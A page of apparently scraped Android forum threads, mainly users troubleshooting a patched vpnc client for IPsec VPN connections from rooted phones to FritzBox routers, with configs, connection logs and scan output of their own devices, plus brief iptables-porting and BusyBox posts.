Database Info

Need Iptables With Set Implementation

Hi, I'm doing some porting for the phone.
Everything goes fine but except...
# iptables -A INPUT -p tcp --sport 80 --tcp-flags FIN,SYN,RST,ACK SYN,ACK -m state --state ESTABLISHED -m set --match-set NOCLIP src -j ZHANG
FIX ME! implement getprotobyname() bionic/libc/bionic/stubs.c:372
iptables v1.3.7: Couldn't find match `set'
A patched ipset works and the kernel modules of it seems to be loaded correctly and I can define sets.
# ipset -L GOOGLE
Name: GOOGLE
Type: nethash
References: 1
Header: hashsize: 225 probes: 1 resize: 50
Members:
64.233.160.0/19
8.6.48.0/21
64.68.88.0/21
4.3.2.0/24
66.249.64.0/19
173.194.0.0/16
8.8.8.0/24
74.125.0.0/16
8.8.4.0/24
216.239.32.0/19
209.85.128.0/17
66.102.0.0/20
72.14.192.0/18
64.68.80.0/21
So there are problems with iptables.
I've looked into external/iptables/Android.mk and found that set is not enabled, and, this version of iptables seems don't know --match-set. Abort.
And I also tried the latest one which version number is 1.4.7 on github but I can't get it compiled.
And if you are Chinese and you are interested in FanQiang(f***ing GFW) contact me and let's do it together. As far as I know now only tor works on Android phone except VPN.

VPNC to FritzBox works!!!!

YES with this patched vpnc you can connect from a rooted desire (or any other android device) to your AVM fritzbox with the original firmware. The included vpnc-script will help to fix the routing problems.
You need a rooted Android device with an tun.ko module
First setup your fritzbox like the iphone setup which is described at the avm portal (google-> "avm iphone vpn")
Install signed-FritzBox.apk to your phone.
Setup now your vpnc-gui and be happy.
--------------------------------------------------------------------------
Some detailed infos how to connect the Fritzbox with IPSEC via VPNC:
1.) you must use a IKE_ATTRIB_LIFE_DURATION = 3600 (seconds)
2.) you must use draft-ietf-ipsec-nat-t-ike-03
the original vpnc uses a IKE_ATTRIB_LIFE_DURATION with 2147483 (seconds) and only uses draft-ietf-ipsec-nat-t-ike-00 -> 02.
I change the timing to 3600 (seconds) and change the transformset 02 to 03.
Timing -> find in vpnc 000020C49B and change it to 0000000E10 (2x)
Transformset -> find in vpnc CD60464335DF21F87CFDB2FC68B6A448 and change it to 7D9419A65310CA6F2C179D9215529D56 (1x)
By the way these patch will help any vpnc user on every linux (i tested this with ubuntu and it works perfect)
----------------------------------------------------------------------------
update 20.12.2010
----------------------------------------------------------------------------
New APK to install on a rooted Android device. After installing you can connet via IPSEC VPN to a cisco device and to the FritzBox with the latest Firmware without modifying the FritzBox
For all who wants to use the FritzPhone App to make phonecalls via vpnc this will not work because the app did not use the 3G interface (only wlan). Download the app "3cx" from the market and in the setup menu "integration" you will find "Enable 3G", thats all.

Hi there!
Really nice one but I'm getting a forced closed when I push the connect button.
I'm using a SE X10 with android 2.1.........
Sometimes I hate my phone.......

Merry Christmas.
Is your Device rooted and had the vpnc the exec permissions ?
Please install "Quick System Info" and check the loginfos via the Logcat.
Maybe in your Kernel the tun.ko is missing.

Hello
@mp1405
Thanks for the signed-FritzBox.apk. I finally got it running on my Samsung I9000 Froyo XXJPU and Fritzbox 7390
First I had also the FC because the tun.ko was missing. Now it works but but I have to load the kernel module every reboot in the konsole with insmod /system/lib/modules/tun.ko
I edited the file /init.rc with the line insmod /system/lib/modules/tun.ko but every reboot a "recovery" init.rc is loaded without my insmod line. There was also the tip to copy the tun.ko into /lib/modules/tun.ko but the tun.ko gets deleted after every reboot.
Kind regards

@mp1405
Thanks for your work and time for this patched Version.
For my understanding:
IPSec ID is what ? My e-Mailadress from the FritzboxConfig ?
IPSec Secret is the Passphrase ?
Is this correct ?
Thanks!

Hello
IPSec ID: Yes, your e-Mailadress from the FritzboxConfig (it is the entry "user_fqdn" which you have to replace with "key_id" in the config.
IPSec Secret: Is the Passphrase (also named Pre-Shared Key or just "key") in the Fritzbox Configs.

Perfect! It works with the correct tun.ko
Thanks @all and mp1405 for this patched Version.

my fritzbox said The import of the VPN-Settings faild.
And I did it twice exactly with the iphone settings.
anyone else with that kind of problem?
I'm using Fritzbox 7270 fon with the latest firmware.
stephen

@stephen21
have the same problem with 7270, every cfg that is "toucht" with any editor. dosnt work.
Im kontakted the avm support and wait to the answer.
greatings
meinbier
PS. Sorry for my bad english

Thanks for the apk and the howto,
I've done everything as described, but I get always following (log) message :
Code:
D/VPN_Connections( 5436): process stderr: no response from target

@sky01x
Hi Sky, where You have found the right tun.ko?
Thanks for a hint.
To.

@lier99
I got the tun.ko from:
http://forum.xda-developers.com/showthread.php?t=793712
Best regards

I9000XXJPY
Kernel 2.6.32.9 hardcore k12h-500hz #2
XXJPY_Doc_v7_Kitchen
Fritzbox 7270
Thanks for the apk and the howto,
but still a little trouble.
The Fritzbox cfg is changed according to ipfone config from AVM.
The VPN Connections says connected.
The Fritzbox says Status green, I have an internet IP, I see my asigned IP, but for the local net I get 0.0.0.0. From there I do not get into my local network. When ever I try to change the Fritzbox cfg to
phase2localid {
ipnet {
ipaddr = 192.168.1.0;
mask = 255.255.255.0;
}
}
phase2remoteid {
ipaddr = 192.168.1.203;
}
phase2ss = "esp-all-all/ah-none/comp-all/no-pfs";
accesslist =
"permit ip 192.168.1.0 255.255.255.0 192.168.1.203 255.255.255.255";
like my Notebook runs fine on the tunel, the connection failed.
Any idea?

VPN dont work via GSM/UMTS connection
Hello,
need help my VPN dont work via GSM/UMTS connection.
My configuration:
FritzBox 7170 with Firmware-Version 29.04.86-18946 (Laborversion)
and VPN configuerd as IPhone.
Dynamic DNS is aktiv and ready.
Handy HTC Desire with LeeDriod v2.03c
VPNC from mp1405 singned-myVPNC.apk
now if I'm connected via WLAN to my FritzBox I have a VPN connection,
but via GSM or UMTS I get no connection - why?
Thanks

Thanks for your great work! My 7270 shows connection established.
However there seems to be a problem with your vpnc-script. I'm getting a
Device "default via <UMTS-IP> dev rmnet0 " does not exist.
Error: either "to" is duplicate, or "hoplimit" is a garbage.
backing up dns settings
vpnc-script ran to completion
on the console. Maybe I can further look into it tonight.
#Running Leedroid2.3a

mp1405 said:
----------------------------------------------------------------------------
update 20.12.2010
----------------------------------------------------------------------------
New APK to install on a rooted Android device. After installing you can connet via IPSEC VPN to a cisco device and to the FritzBox with the latest Firmware without modifying the FritzBox
Click to expand...
Click to collapse
So, do you mean that i need only to install the attached signed-myVPNC.apk and i can connect to my fritz without doing the iphone patching procedure on the fritz side? or i need to do it anyway?
does this apk work with gingerbread too?
update:
i imported the modified vpn config to my fritz, installed the signed VPN Connect.apk and set up the account, and tried to connect, it says connected on both Android and my fritz, but i cannot connect to addresses inside my fritz.
the build of android i use (NexusHD2 - Gingerbread 2.2) seems to have a tun.so file, so i don't need to import it, right?
what else can i do ??

mp1405 said:
...
For all who wants to use the FritzPhone App to make phonecalls via vpnc this will not work because the app did not use the 3G interface (only wlan). Download the app "3cx" from the market and in the setup menu "integration" you will find "Enable 3G", thats all.
Click to expand...
Click to collapse
Hi,
Thank you for this. The last thing that I will not get to work is to connect with Firtz!box fon to the box accross 3g
I have downloaded the 3cx an enabled "Enable 3g" without any other settings in the profile. But in fritz!box fon there the "not connected" is remaining. Any other hints?
Android "DHD Leedroid 2.2.2"
FritzBox "7270 Firmware 54.04.88"
Thx

I am running a HD2 with the latest CM7 ROM and I have a FritzBox 3270 with the latest firmware.
Thanks to this I can finally establish a VPN connection with my phone.

not work for me
Fritzbox config:
vpncfg {
connections {
enabled = yes;
conn_type = conntype_user;
name = "my mail";
always_renew = no;
reject_not_encrypted = no;
dont_filter_netbios = yes;
localip = 0.0.0.0;
local_virtualip = 0.0.0.0;
remoteip = 0.0.0.0;
remote_virtualip = 192.168.178.201;
remoteid {
key_id = "my mail";
}
mode = phase1_mode_aggressive;
phase1ss = "all/all/all";
keytype = connkeytype_pre_shared;
key = "my key";
cert_do_server_auth = no;
use_nat_t = yes;
use_xauth = yes;
use_cfgmode = no;
xauth {
valid = yes;
username = "my login";
passwd = "mypass";
}
phase2localid {
ipnet {
ipaddr = 192.168.178.0;
mask = 255.255.255.0;
}
}
phase2remoteid {
ipaddr = 192.168.178.201;
}
phase2ss = "esp-all-all/ah-none/comp-all/pfs";
accesslist =
"permit ip 192.168.178.0 255.255.255.0 192.168.178.201 255.255.255.255";
}
ike_forward_rules = "udp 0.0.0.0:500 0.0.0.0:500",
"udp 0.0.0.0:4500 0.0.0.0:4500";
}
// EOF
Click to expand...
Click to collapse
And log from android (MIUI):
pre-init phase...
connect phase...
vpnc-script ran to completion
quick mode response rejected: (ISAKMP_N_INVALID_MESSAGE_ID)(9)
this means the concentrator did not like what we had to offer.
Possible reasons are:
* concentrator configured to require a firewall
this locks out even Cisco clients on any platform expect windows
which is an obvious security improvment. There is no workaround (yet).
* concentrator configured to require IP compression
this is not yet supported by vpnc.
Note: the Cisco Concentrator Documentation recommends against using
compression, expect on low-bandwith (read: ISDN) links, because it
uses much CPU-resources on the concentrator
vpnc version 0.5.3-mjm1-140M
S1 init_sockaddr
[2011-07-29 21:05:48]
S2 make_socket
[2011-07-29 21:05:48]
S3 setup_tunnel
[2011-07-29 21:05:48]
using interface tun0
S4 do_phase1_am
[2011-07-29 21:05:48]
S4.1 create_nonce
[2011-07-29 21:05:48]
S4.2 dh setup
[2011-07-29 21:05:48]
S4.3 AM packet_1
[2011-07-29 21:05:48]
S4.4 AM_packet2
[2011-07-29 21:05:49]
(Xauth)
(DPD)
(Nat-T 03)
(unknown)
got ike lifetime attributes: 3600 seconds
IKE SA selected psk+xauth-aes256-sha1
ignoring that peer is DPD capable (RFC3706)
peer is NAT-T capable (draft-03)
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
peer is using type 130 (ISAKMP_PAYLOAD_NAT_D_OLD) for NAT-Discovery payloads
S4.5 AM_packet3
[2011-07-29 21:05:49]
NAT status: this end behind NAT? YES -- remote end behind NAT? YES
NAT-T mode, adding non-esp marker
S4.6 cleanup
[2011-07-29 21:05:49]
S5 do_phase2_xauth
[2011-07-29 21:05:49]
S5.1 xauth_start
[2011-07-29 21:05:49]
S5.2 notice_check
[2011-07-29 21:05:49]
S5.3 type-is-xauth check
[2011-07-29 21:05:49]
S5.4 xauth type check
[2011-07-29 21:05:49]
S5.5 do xauth authentication
[2011-07-29 21:05:49]
NAT-T mode, adding non-esp marker
S5.2 notice_check
[2011-07-29 21:05:49]
S5.3 type-is-xauth check
[2011-07-29 21:05:49]
S5.6 process xauth response
[2011-07-29 21:05:49]
NAT-T mode, adding non-esp marker
S5.7 xauth done
[2011-07-29 21:05:49]
S6 do_phase2_config
[2011-07-29 21:05:49]
S6.1 phase2_config send modecfg
[2011-07-29 21:05:49]
NAT-T mode, adding non-esp marker
S6.2 phase2_config receive modecfg
[2011-07-29 21:05:50]
got save password setting: 0
got address 192.168.178.201
S7 setup_link (phase 2 + main_loop)
[2011-07-29 21:05:50]
S7.0 run interface setup script
[2011-07-29 21:05:50]
S7.1 QM_packet1
[2011-07-29 21:05:50]
S7.2 QM_packet2 send_receive
[2011-07-29 21:05:50]
NAT-T mode, adding non-esp marker
S7.3 QM_packet2 validate type
[2011-07-29 21:05:50]
S7.4 process and skip lifetime notice
[2011-07-29 21:05:50]
S7.5 QM_packet2 check reject offer
[2011-07-29 21:05:50]
---!!!!!!!!! entering phase2_fatal !!!!!!!!!---
NAT-T mode, adding non-esp marker
NAT-T mode, adding non-esp marker
disconnect phase...
ip: can't find device 'tun0'
ip: an inet prefix is expected rather than ""
ip: RTNETLINK answers: No such process
DNS not restored (no active default gateway)
Click to expand...
Click to collapse
Please help me. What I should do ?

If this helps the developers to keep the stuff up to date, here's the Handshake from a fritzbox 7240 v. Firmware-Version 73.05.05 with default vpn config:
Code:
~$ ike-scan -v -s 0 --aggressive --id=xxxxxxxxxxxxx fritz.box
DEBUG: pkt len=380 bytes, bandwidth=56000 bps, int=58285 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x Aggressive Mode Handshake returned
HDR=(CKY-R=a79e96b1e2acf788)
SA=(Enc=3DES Hash=SHA1
Auth=PSK Group=2:modp1024
LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(16 bytes)
ID(Type=ID_IPV4_ADDR, Value=xxxxxxxx)
Hash(20 bytes)
Notification=(Type=RESPONDER-LIFETIME, SPI=741b17c61bce146aa79e96b1e2acf788,
Data=800b0001800c0e10)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100
(Dead Peer Detection v1.0)
Ending ike-scan 1.9: 1 hosts scanned in 0.269 seconds (3.72 hosts/sec). 1 returned handshake; 0 returned notify
The fritzbox only answers aggressive mode, this may be the reason for faulting android vpn client, see android system logs...
Code:
Get osmonitor app exported logcat log (no permissions over sshfs):
$ scp htc:/mnt/sdcard/log1 .
grep it for ipsec vpn racoon:
08/03/2011 17:03:50 [INFORMATION] racoon(7090) ipsec-tools 0.7.3 (http://ipsec-tools.sf.net)
08/03/2011 17:01:44 [INFORMATION] ActivityManager(118) Displayed com.android.settings/.vpn.VpnSettings: +312ms
08/03/2011 17:01:57 [DEBUG] com.android.settings.vpn.AuthenticationActor(3067) ~~~~~~ connect() succeeded!
at com.android.server.vpn.VpnService.getIp(VpnService.java:108)
at com.android.server.vpn.VpnService.onConnect(VpnService.java:135)
at com.android.server.vpn.VpnServiceBinder$2.run(VpnServiceBinder.java:117)
08/03/2011 17:01:58 [INFORMATION] ipd(77) IP CMD: /system/bin/ip ru del from all to all table vpn prio 2500
08/03/2011 17:02:06 [INFORMATION] ActivityManager(118) Displayed com.android.settings/.vpn.VpnEditor: +479ms
08/03/2011 17:03:39 [INFORMATION] ActivityManager(118) Displayed com.android.settings/.vpn.VpnSettings: +328ms
08/03/2011 17:03:49 [DEBUG] com.android.settings.vpn.AuthenticationActor(3067) ~~~~~~ connect() succeeded!
at com.android.server.vpn.VpnService.waitUntilConnectedOrTimedout(VpnService.java:210)
at com.android.server.vpn.VpnService.onConnect(VpnService.java:139)
at com.android.server.vpn.VpnServiceBinder$2.run(VpnServiceBinder.java:117)
08/03/2011 17:04:35 [INFORMATION] ipd(77) IP CMD: /system/bin/ip ru del from all to all table vpn prio 2500
08/03/2011 17:01:57 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:01:57 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
08/03/2011 17:01:57 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
08/03/2011 17:01:58 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:01:58 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
08/03/2011 17:01:58 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
08/03/2011 17:03:49 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
08/03/2011 17:03:49 [INFORMATION] SProxy_racoon(6207) Start VPN daemon: racoon
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) racoon is running after 0 msec
08/03/2011 17:03:49 [DEBUG] racoon(7090) Waiting for control socket
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) service not yet listen()ing; try again
08/03/2011 17:03:50 [DEBUG] racoon(7090) Received 3 arguments
08/03/2011 17:03:50 [INFORMATION] racoon(7090) ipsec-tools 0.7.3 (http://ipsec-tools.sf.net)
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[500] used as isakmp port (fd=10)
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[500] used for NAT-T
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[4500] used as isakmp port (fd=11)
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[4500] used for NAT-T
08/03/2011 17:03:50 [INFORMATION] SProxy_racoon(6207) got data from control socket: 3
08/03/2011 17:03:52 [INFORMATION] racoon(7090) no in-bound policy found: 192.168.0.3/32[1701] 192.168.0.106/32[0] proto=udp dir=in
08/03/2011 17:03:52 [INFORMATION] racoon(7090) IPsec-SA request for 192.168.0.3 queued due to no phase1 found.
08/03/2011 17:03:52 [INFORMATION] racoon(7090) initiate new phase 1 negotiation: 192.168.0.106[500]<=>192.168.0.3[500]
08/03/2011 17:03:52 [INFORMATION] racoon(7090) begin Identity Protection mode.
08/03/2011 17:04:23 [ERROR] racoon(7090) phase2 negotiation failed due to time up waiting for phase1. ESP 192.168.0.3[0]->192.168.0.106[0]
08/03/2011 17:04:23 [INFORMATION] racoon(7090) delete phase 2 handler.
08/03/2011 17:04:23 [INFORMATION] racoon(7090) Bye
08/03/2011 17:04:35 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:04:35 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
08/03/2011 17:04:35 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
I'm trying to adapt the fritzbox vpn config to match the faulting android 2.3.3 built-in vpn-client's requirements, further logs from other vpn-clients will follow.
The android vpn asks for xauth credentials, trying to configure fritzbox for xauth...
no success,
android racoon still phase 1 waiting timeout, changing fritzbox from agressive to main mode...
no success, still phase1 time out, taking and analyzing wireshark dump from
http://fritz.box//html/capture.html (if ath0 or guest1 etc)
Ok, here's what the android racoon sends to the fritz.box:
Code:
$ /usr/sbin/tcpdump -vvv -r fritz-ath0.eth src or dst port 500 or src or dst port l2f
reading from file fritz-ath0.eth, link-type EN10MB (Ethernet)
00:29:57.082587 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:07.104380 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:17.123829 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:27.145065 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:29.149902 IP (tos 0x0, ttl 64, id 51970, offset 0, flags [DF], proto UDP (17), length 97)
htc.fritz.box.51610 > fritz.box.l2f: [udp sum ok] l2tp:[TLS](0/0)Ns=0,Nr=0 *MSGTYPE(SCCRQ) *PROTO_VER(1.0) *HOST_NAME(anonymous) *FRAMING_CAP(AS) *ASSND_TUN_ID(798) *RECV_WIN_SIZE(1)
Code:
$ ike-scan -v -s 0 fritz.box
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
--- Pass 1 of 3 completed
--- Pass 2 of 3 completed
--- Pass 3 of 3 completed
Ending ike-scan 1.9: 1 hosts scanned in 2.445 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify
wireshark compatible file is attached.
I've found the allowed ipsec strategies for /bin/avmike in
Code:
# find / -name *ipsec*
/etc/default.Fritz_Box_7240/1und1/ipsec.cfg
/etc/default.Fritz_Box_7240/avm/ipsec.cfg
#
#
# find / -name *ike*
/bin/avmike
/lib/libikeapi.so
/lib/libikeapi.so.2
/lib/libikeapi.so.2.0.0
/lib/libikecrypto.so
/lib/libikecrypto.so.1
/lib/libikecrypto.so.1.0.0
/lib/libikeossl.so
/lib/libikeossl.so.1
/lib/libikeossl.so.1.0.0
/var/run/avmike.pid
/var/tmp/csem/M-ikeapi-reply-dsld-W
/var/tmp/csem/M-ikeapi-reply-dsld-R
/var/tmp/csem/M-ikeapi-request-dsld-W
/var/tmp/csem/M-ikeapi-request-dsld-R
#
# find / -name *vpn*
/etc/default.Fritz_Box_7240/1und1/vpn.cfg
/etc/default.Fritz_Box_7240/avm/vpn.cfg
/usr/share/ctlmgr/libvpnstat.so
/usr/www/1und1/html/de/internet/vpn.frm
/usr/www/1und1/html/de/internet/vpn.html
/usr/www/1und1/html/de/internet/vpn.js
/usr/www/1und1/html/de/menus/menu2_vpn.html
/usr/www/1und1/html/de/vpn
/usr/www/1und1/html/vpn_import_nok_reboot.html
/usr/www/1und1/html/vpn_import_ok_reboot.html
/usr/www/1und1/html/vpn_import_pwd_nok_reboot.html
/usr/www/avm/html/de/internet/vpn.frm
/usr/www/avm/html/de/internet/vpn.html
/usr/www/avm/html/de/internet/vpn.js
/usr/www/avm/html/de/menus/menu2_vpn.html
/usr/www/avm/html/de/vpn
/usr/www/avm/html/vpn_import_nok_reboot.html
/usr/www/avm/html/vpn_import_ok_reboot.html
/usr/www/avm/html/vpn_import_pwd_nok_reboot.html
/var/vpnroutes
/var/flash/vpn.cfg
/var/tmp/vpncfgimport.eff
#
# avmike -h
illegal option 'h'
usage: avmike avm_ike [options]
options:
-? - print this help
-D STRING - switch debug logs on. (NULL)
-d - debug service. (NOTSET)
-f - run in forground. (NOTSET)
-s - stop daemon. (NOTSET)
-v - verbose. (NOTSET)
-p STRING - Pidfile. ("/var/run/avmike.pid")
-w - [Hit return to continue]. (NOTSET)
-p INTEGER - port to use. (0)
ISAKMP/IPSec negoiation server
Trying to enable debug logs... debug options silently disabled in release build.
Matching fritzbox factory ike config for Android 2.3.3 racoon is phase1ss = "racoon-dh2-aes-sha", but --lifetime=3600 or datatype length or formatting, or wrong other config file settings:
Code:
# ike-scan fritz.box -M --retry=1 --trans=7/128,2,1,2 --lifetime=3600
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
Ending ike-scan 1.9: 1 hosts scanned in 0.532 seconds (1.88 hosts/sec). 0 returned handshake; 0 returned notify
19:37:36.599736 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 116)
tom1.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 84cdf79f56296b8b->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=1
(t: #1 id=ike (type=enc value=aes)(type=hash value=sha1)(type=auth value=preshared)(type=group desc value=modp1024)(type=keylen value=0080)(type=lifetype value=sec)(type=lifeduration [B]len=4 value=00007080[/B]))))
No answer from avmike, trying Android... no success.
Surely config file mismatch, see http://www.ip-phone-forum.de/showthread.php?t=161793&p=1672919&viewfull=1#post1672919 and search there under avm for posts containing phase1_mode_idp.
No. Tried to override the /etc/default/ipsec.cfg inline in vpn.cfg and > /var/flash/vpn.cfg but the box does all to prevent any tricks to change the ipsec.cfg, even removing the ipsec part from vpn.cfg when in comments.
Giving up and will remove the proprietary crap avm vpn daemon from the box, install something like freetz with racoon.
For those not able/not want to root their phone here's the solution for fritzbox:
http://www.ip-phone-forum.de/showthread.php?t=197637&pagenumber=
http://freetz.org/ticket/854
(Mostly german, use google translator)

BusyBox v1.18.5 arm binary

compiled it for myself, maybe someone find it usefull
BusyBox v1.18.5 (2011-07-18 07:43:28 PDT) multi-call binary.
Copyright (C) 1998-2009 Erik Andersen, Rob Landley, Denys Vlasenko
and others. Licensed under GPLv2.
See source distribution for full notice.
Usage: busybox [function] [arguments]...
or: busybox --list[-full]
or: function [arguments]...
BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use and BusyBox
will act like whatever it was invoked as.
Currently defined functions:
[, [[, acpid, add-shell, addgroup, adduser, adjtimex, ar, arp, arping,
ash, awk, base64, basename, beep, blkid, blockdev, bootchartd, brctl,
